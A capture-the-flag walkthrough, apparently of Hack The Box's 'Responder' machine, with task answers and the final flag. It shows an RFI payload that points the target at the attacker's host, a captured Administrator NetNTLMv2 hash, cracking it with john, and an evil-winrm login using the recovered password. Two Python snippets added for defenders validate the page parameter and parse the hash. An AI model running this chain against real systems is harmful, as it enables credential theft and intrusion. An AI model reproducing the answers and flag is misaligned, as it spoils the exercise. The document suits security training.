# Related material

  • getshell
  • Responder capturing Windows hashes
  • evil-winrm

# Task 1

Q:How many TCP ports are open on the machine?

```
┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  wsman
7680/tcp open  pando-pub
Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds
```

Plenty of commands can scan ports, so this exact one is not required; leaving out the other scan options saves a lot more time.

A:3

# Task 2

Q:When visiting the web service using the IP address, what is the domain that we are being redirected to?

Just open it in the browser and see where it redirects.

A:unika.htb

# Task 3

Q:Which scripting language is being used on the server to generate webpages?

Capture the request and look at the response; the headers return version information.

You can also add a hosts-file entry for the name, so that after the redirect the domain still resolves to the IP address.

A:php

# Task 4

Q:What is the name of the URL parameter which is used to load different language versions of the webpage?

Click any link and look at the parameter that gets submitted.

A:page

# Task 5

Q:Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Asks which value is a local file inclusion.

A: ../../../../../../../../windows/system32/drivers/etc/hosts

# Task 6

Q:Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

Asks which value is a remote file inclusion.

A: //10.10.14.6/somefile
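To make the LFI/RFI distinction concrete from the server side, here is an added Python example (written for this note, not code from the page or from the unika.htb application) that classifies a `page` value before anything is included: remote locations are refused as RFI attempts, traversal and absolute paths as LFI attempts, and everything else must match a fixed allowlist. `PAGE_DIR` and `ALLOWED_PAGES` are assumed values; the four candidate values from the two questions are the inputs.

```python
import posixpath
import re
from typing import NamedTuple, Optional
from urllib.parse import parse_qs

# Assumed deployment details (not taken from the page): where the language pages
# live and which files the application is allowed to include at all.
PAGE_DIR = "/var/www/html"
ALLOWED_PAGES = frozenset({"english.html", "french.html", "german.html"})

# Values that name a remote location: "//host/share", "\\host\share" or "scheme://...".
# An include() of one of these fetches code over the network (the RFI case).
_REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//|^\\\\", re.IGNORECASE)


class PageDecision(NamedTuple):
    allowed: bool
    reason: str           # category to log: ok / rfi-attempt / lfi-attempt / not-in-allowlist
    path: Optional[str]   # the file to include, only when allowed


def classify_page_param(value: str) -> PageDecision:
    """Decide whether a ?page= value may be included, and label rejected values for the log."""
    if _REMOTE_RE.match(value):
        return PageDecision(False, "rfi-attempt", None)
    # Traversal ("..") or an absolute path reaches outside PAGE_DIR (the LFI case);
    # backslashes count as separators because the server in the page is Windows.
    parts = value.replace("\\", "/").split("/")
    if ".." in parts or (value and parts[0] == "") or re.match(r"^[A-Za-z]:", value):
        return PageDecision(False, "lfi-attempt", None)
    # Only exact, pre-approved file names get through; "minikatz.exe" and the like stop here.
    if value not in ALLOWED_PAGES:
        return PageDecision(False, "not-in-allowlist", None)
    # Defence in depth: the resolved path must still sit inside PAGE_DIR.
    candidate = posixpath.normpath(posixpath.join(PAGE_DIR, value))
    if posixpath.commonpath([PAGE_DIR, candidate]) != PAGE_DIR:
        return PageDecision(False, "lfi-attempt", None)
    return PageDecision(True, "ok", candidate)


def check_request(query_string: str) -> PageDecision:
    """Apply the check to a raw query string such as 'page=french.html' (percent-decoded by parse_qs)."""
    values = parse_qs(query_string).get("page", [])
    if len(values) != 1:
        return PageDecision(False, "missing-or-repeated-page", None)
    return classify_page_param(values[0])


if __name__ == "__main__":
    for candidate in ("french.html", "//10.10.14.6/somefile",
                      "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"):
        print("%-62s -> %s" % (candidate, classify_page_param(candidate).reason))
```

The `reason` field is what a web application firewall or the application log should record: a burst of `rfi-attempt` entries naming an outside host is exactly the precursor to the hash capture shown later on this page.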

# Task 7

Q:What does NTLM stand for?

NTLM is a suite of authentication protocols created by Microsoft. It is a challenge-response authentication protocol used to authenticate clients to resources in an Active Directory domain.

A:New Technology LAN Manager

# Task 8

Q:Which flag do we use in the Responder utility to specify the network interface?

The Responder tool's option for the network interface.

A: -I

# Task 9

Q:There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john , but the full name is what?.

It is used to crack hashes; I will have to try it out together with Responder.

A:john the ripper

# Task 10

Q:What is the password for the administrator user?

First start Responder listening on the local tun0 interface.

```
┌──(root💀kali)-[~]
└─# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
           NBT-NS, LLMNR & MDNS Responder 3.0.7.0
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
    DHCP                       [OFF]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
    Fingerprint hosts          [OFF]
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.86]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Current Session Variables:
    Responder Machine Name     [WIN-BEA716J9KXD]
    Responder Domain Name      [HALN.LOCAL]
    Responder DCE-RPC Port     [47831]
[+] Listening for events...
```

Visit `unika.htb/?page=//10.10.14.6/somefile`

Make it remotely include a file from our host; it connects back to us, and the hash is intercepted.

```
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:c0c8045502c4f5c9:3BC1DBA1408AC8C9983028A14C1D4BAD:010100000000000080A1D5FFB460D8019D88C898C17C526F000000000200080032004F003100440001001E00570049004E002D005800570056003200510039003600370052004100340004003400570049004E002D00580057005600320051003900360037005200410034002E0032004F00310044002E004C004F00430041004C000300140032004F00310044002E004C004F00430041004C000500140032004F00310044002E004C004F00430041004C000700080080A1D5FFB460D80106000400020000000800300030000000000000000100000000200000C87CC66EFD81FD5B28F598D5ABF20A35198A4161CBD14CF93DB63F66F81482FB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000
[*] Skipping previously captured hash for RESPONDER\Administrator
```

Then create a new file, save the hash from line 7 (the `NTLMv2-SSP Hash` value) into it and crack it with john; this takes quite a while.

```
┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII
```


Damn, it ran for two hours and still hadn't cracked it.

A:badminton
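What a defender can read out of the captured line without cracking anything, as an added example (Python written for this note; it is not code from the page or from Responder): the `User::Domain:ServerChallenge:NTProofStr:Blob` fields, and inside the blob the client's timestamp and the target-info AV pairs, named as in MS-NLMP. For incident triage the useful pieces are the timestamp and `MsvAvTargetName`, the SPN the victim asked for, which here is `cifs/10.10.16.86`, the Responder IP from the banner above rather than any legitimate file server. `PAGE_HASH_LINE` is the hash line from the capture above, split only for readability; the MS-NLMP names and offsets are from the specification.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict, NamedTuple

# AV_PAIR ids from MS-NLMP 2.2.2.1: the target-info list carried inside the blob
AV_IDS = {
    0x0001: "MsvAvNbComputerName", 0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName", 0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName", 0x0006: "MsvAvFlags", 0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost", 0x0009: "MsvAvTargetName", 0x000A: "MsvAvChannelBindings",
}
TEXT_AV_IDS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}  # UTF-16LE string values
FILETIME_UNIX_OFFSET = 116444736000000000  # 100-ns ticks from 1601-01-01 to 1970-01-01


class NetNtlmV2(NamedTuple):
    user: str
    domain: str
    server_challenge: bytes   # 8 bytes picked by the server (here: Responder)
    nt_proof_str: bytes       # 16 bytes, HMAC-MD5 over server challenge + blob
    timestamp: datetime       # the client's clock when it answered
    client_challenge: bytes   # 8 random bytes from the client
    av_pairs: Dict[str, object]


def filetime_to_datetime(ticks: int) -> datetime:
    """Windows FILETIME (100-ns ticks since 1601-01-01 UTC) to an aware UTC datetime."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(
        microseconds=(ticks - FILETIME_UNIX_OFFSET) // 10)


def parse_av_pairs(data: bytes, offset: int) -> Dict[str, object]:
    """Walk the (id, length, value) AV_PAIR list until MsvAvEOL."""
    pairs: Dict[str, object] = {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        value = data[offset + 4:offset + 4 + av_len]
        offset += 4 + av_len
        if av_id == 0x0000:  # MsvAvEOL terminates the list
            return pairs
        name = AV_IDS.get(av_id, "MsvAvUnknown_%#06x" % av_id)
        if av_id in TEXT_AV_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 0x0006:
            pairs[name] = struct.unpack("<I", value)[0]
        elif av_id == 0x0007:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value  # MsvAvSingleHost / MsvAvChannelBindings stay raw


def parse_responder_line(line: str) -> NetNtlmV2:
    """Parse 'User::Domain:ServerChallenge:NTProofStr:Blob', bare or as Responder logs it."""
    line = line.strip()
    if "NTLMv2-SSP Hash" in line.split("::", 1)[0]:
        line = line.split(":", 1)[1].strip()  # drop the "[SMB] NTLMv2-SSP Hash :" prefix
    user, sep, rest = line.partition("::")
    if not sep:
        raise ValueError("not a NetNTLMv2 line: missing '::' separator")
    domain, challenge_hex, proof_hex, blob_hex = rest.split(":", 3)
    server_challenge, nt_proof_str, blob = (bytes.fromhex(h) for h in (challenge_hex, proof_hex, blob_hex))
    if len(server_challenge) != 8 or len(nt_proof_str) != 16:
        raise ValueError("server challenge must be 8 bytes and NTProofStr 16 bytes")
    # Blob header: RespType, HiRespType, Reserved1, Reserved2, TimeStamp (16 bytes), then
    # the 8-byte ChallengeFromClient, 4 reserved bytes and the AV_PAIR list at offset 28.
    resp_type, hi_resp_type, _r1, _r2, ticks = struct.unpack_from("<BBHIQ", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("blob does not start with the NTLMv2 RespType/HiRespType marker")
    return NetNtlmV2(user, domain, server_challenge, nt_proof_str,
                     filetime_to_datetime(ticks), blob[16:24], parse_av_pairs(blob, 28))


def summarize(entry: NetNtlmV2) -> str:
    """One line for an incident note: which account authenticated, to which SPN, and when."""
    target = entry.av_pairs.get("MsvAvTargetName", "<no MsvAvTargetName>")
    return "%s\\%s authenticated to %s at %s" % (
        entry.domain, entry.user, target, entry.timestamp.isoformat())


# The hash line captured above (copied from the page, split only for readability)
PAGE_HASH_LINE = (
    "Administrator::RESPONDER:c0c8045502c4f5c9:3BC1DBA1408AC8C9983028A14C1D4BAD:"
    "010100000000000080A1D5FFB460D8019D88C898C17C526F00000000"
    "0200080032004F003100440001001E00570049004E002D0058005700560032005100390036003700520041003400"
    "04003400570049004E002D00580057005600320051003900360037005200410034002E0032004F00310044002E004C004F00430041004C00"
    "0300140032004F00310044002E004C004F00430041004C000500140032004F00310044002E004C004F00430041004C00"
    "0700080080A1D5FFB460D8010600040002000000"
    "0800300030000000000000000100000000200000C87CC66EFD81FD5B28F598D5ABF20A35198A4161CBD14CF93DB63F66F81482FB"
    "0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0038003600"
    "0000000000000000"
)

if __name__ == "__main__":
    entry = parse_responder_line(PAGE_HASH_LINE)
    print(summarize(entry))
    for name, value in entry.av_pairs.items():
        print("  %-22s %r" % (name, value))
```

Running it on the page's line prints `RESPONDER\Administrator authenticated to cifs/10.10.16.86 at 2022-05-05T19:19:11+00:00`. Two things in the AV pairs are worth a detection rule on the web server: the target SPN points at an address that is not a known file server, and the NetBIOS and DNS names in the blob (`WIN-XWV2Q967RA4`, `2O1D.LOCAL`) match no host in the real domain, because Responder makes them up per session (compare the different ones in its banner above).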

# Task 11

Q:We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

It uses the WS-Management (wsman) remoting service on port 5985.

A:5985

# Flag

Install the evil-winrm tool:

```
┌──(root💀kali)-[~]
└─# gem install evil-winrm
```

Connect with the cracked password:

```
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
```

Read the flag:

```
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir
    Directory: C:\Users\mike
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir
    Directory: C:\Users\mike\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
```

flag: ea81b7afddd03efaa0945333ed147fac